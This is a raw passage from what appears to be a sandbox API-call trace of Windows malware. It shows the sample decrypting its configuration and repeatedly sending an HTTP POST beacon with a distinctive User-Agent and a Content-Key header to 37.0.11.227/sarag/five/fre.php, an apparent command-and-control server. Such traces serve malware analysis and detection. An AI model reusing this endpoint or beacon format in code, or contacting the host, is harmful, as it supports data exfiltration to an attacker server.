hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0343.406] GetProcessHeap () returned 0x690000 [0343.407] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0343.407] GetProcessHeap () returned 0x690000 [0343.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0343.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.408] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0343.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.418] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0343.496] GetProcessHeap () returned 0x690000 [0343.496] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0343.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.503] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0343.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.504] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0343.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.505] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0343.505] GetProcessHeap () returned 0x690000 [0343.505] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0343.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.507] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0343.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.508] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0343.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.509] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0343.510] GetProcessHeap () returned 0x690000 [0343.510] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0343.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.511] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0343.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.512] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0343.513] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.513] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0343.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.514] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0343.514] GetProcessHeap () returned 0x690000 [0343.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0343.514] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0343.514] GetProcessHeap () returned 0x690000 [0343.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0343.515] socket (af=2, type=1, protocol=6) returned 0xc68 [0343.515] connect (s=0xc68, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0343.538] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0343.538] GetProcessHeap () returned 0x690000 [0343.538] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0343.538] GetProcessHeap () returned 0x690000 [0343.538] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0343.539] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0343.540] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0343.540] GetProcessHeap () returned 0x690000 [0343.540] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0343.540] GetProcessHeap () returned 0x690000 [0343.541] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0343.541] GetProcessHeap () returned 0x690000 [0343.541] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0343.541] GetProcessHeap () returned 0x690000 [0343.541] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0343.544] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0343.545] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0343.545] GetProcessHeap () returned 0x690000 [0343.545] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0343.545] GetProcessHeap () returned 0x690000 [0343.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0343.546] send (s=0xc68, buf=0x6ad508*, len=242, flags=0) returned 242 [0343.547] send (s=0xc68, buf=0x6aba40*, len=159, flags=0) returned 159 [0343.547] GetProcessHeap () returned 0x690000 [0343.547] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0343.547] recv (in: s=0xc68, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0343.672] GetProcessHeap () returned 0x690000 [0343.673] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0343.673] GetProcessHeap () returned 0x690000 [0343.673] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0343.673] GetProcessHeap () returned 0x690000 [0343.674] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0343.674] GetProcessHeap () returned 0x690000 [0343.674] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0343.674] closesocket (s=0xc68) returned 0 [0343.675] GetProcessHeap () returned 0x690000 [0343.675] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0343.675] GetProcessHeap () returned 0x690000 [0343.675] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0343.676] GetProcessHeap () returned 0x690000 [0343.676] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0343.676] GetProcessHeap () returned 0x690000 [0343.676] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0343.677] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19b8) returned 0xc68 [0343.680] Sleep (dwMilliseconds=0xea60) [0343.682] GetProcessHeap () returned 0x690000 [0343.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0343.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.687] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0343.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.694] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0343.709] GetProcessHeap () returned 0x690000 [0343.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0343.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.721] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0343.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.722] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0343.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.723] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0343.723] GetProcessHeap () returned 0x690000 [0343.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0343.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.725] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0343.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.726] CryptDestroyKey (hKey=0x69d628) returned 1 [0343.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.726] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0343.727] GetProcessHeap () returned 0x690000 [0343.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0343.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.727] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0343.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.728] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0343.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.731] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0343.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.732] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0343.732] GetProcessHeap () returned 0x690000 [0343.732] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0343.732] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0343.732] GetProcessHeap () returned 0x690000 [0343.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0343.733] GetProcessHeap () returned 0x690000 [0343.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0343.733] GetProcessHeap () returned 0x690000 [0343.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0343.734] GetProcessHeap () returned 0x690000 [0343.734] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0343.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0343.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.742] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0343.753] GetProcessHeap () returned 0x690000 [0343.753] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0343.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.754] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0343.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.755] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0343.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.756] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0343.756] GetProcessHeap () returned 0x690000 [0343.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0343.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.758] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0343.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.759] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0343.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.760] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0343.760] GetProcessHeap () returned 0x690000 [0343.760] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0343.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.761] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0343.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.762] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0343.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.762] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0343.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.763] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0343.763] GetProcessHeap () returned 0x690000 [0343.763] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0343.763] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0343.764] GetProcessHeap () returned 0x690000 [0343.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0343.764] socket (af=2, type=1, protocol=6) returned 0xc6c [0343.765] connect (s=0xc6c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0343.793] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0343.793] GetProcessHeap () returned 0x690000 [0343.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0343.793] GetProcessHeap () returned 0x690000 [0343.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0343.794] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0343.796] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0343.797] GetProcessHeap () returned 0x690000 [0343.797] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0343.797] GetProcessHeap () returned 0x690000 [0343.797] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0343.798] GetProcessHeap () returned 0x690000 [0343.798] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0343.798] GetProcessHeap () returned 0x690000 [0343.798] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0343.798] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0343.799] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0343.799] GetProcessHeap () returned 0x690000 [0343.799] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0343.800] GetProcessHeap () returned 0x690000 [0343.800] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0343.800] send (s=0xc6c, buf=0x6ad508*, len=242, flags=0) returned 242 [0343.801] send (s=0xc6c, buf=0x6aba40*, len=159, flags=0) returned 159 [0343.801] GetProcessHeap () returned 0x690000 [0343.801] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0343.801] recv (in: s=0xc6c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0343.885] GetProcessHeap () returned 0x690000 [0343.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0343.886] GetProcessHeap () returned 0x690000 [0343.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0343.886] GetProcessHeap () returned 0x690000 [0343.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0343.886] GetProcessHeap () returned 0x690000 [0343.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0343.886] closesocket (s=0xc6c) returned 0 [0343.887] GetProcessHeap () returned 0x690000 [0343.887] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0343.887] GetProcessHeap () returned 0x690000 [0343.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0343.888] GetProcessHeap () returned 0x690000 [0343.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0343.888] GetProcessHeap () returned 0x690000 [0343.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0343.888] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19bc) returned 0xc6c [0343.892] Sleep (dwMilliseconds=0xea60) [0343.893] GetProcessHeap () returned 0x690000 [0343.893] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0343.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.897] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0343.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.903] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0343.912] GetProcessHeap () returned 0x690000 [0343.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0343.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.913] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0343.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.918] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0343.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.929] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0343.929] GetProcessHeap () returned 0x690000 [0343.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0343.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.931] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0343.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.932] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0343.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.933] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0343.934] GetProcessHeap () returned 0x690000 [0343.934] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0343.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.935] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0343.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.936] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0343.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.939] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0343.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.941] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0343.941] GetProcessHeap () returned 0x690000 [0343.941] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0343.941] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0343.941] GetProcessHeap () returned 0x690000 [0343.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0343.942] GetProcessHeap () returned 0x690000 [0343.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0343.942] GetProcessHeap () returned 0x690000 [0343.943] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0343.943] GetProcessHeap () returned 0x690000 [0343.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0343.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.944] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0343.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.960] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0343.986] GetProcessHeap () returned 0x690000 [0343.986] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0343.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.990] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0343.990] LoadLibraryW 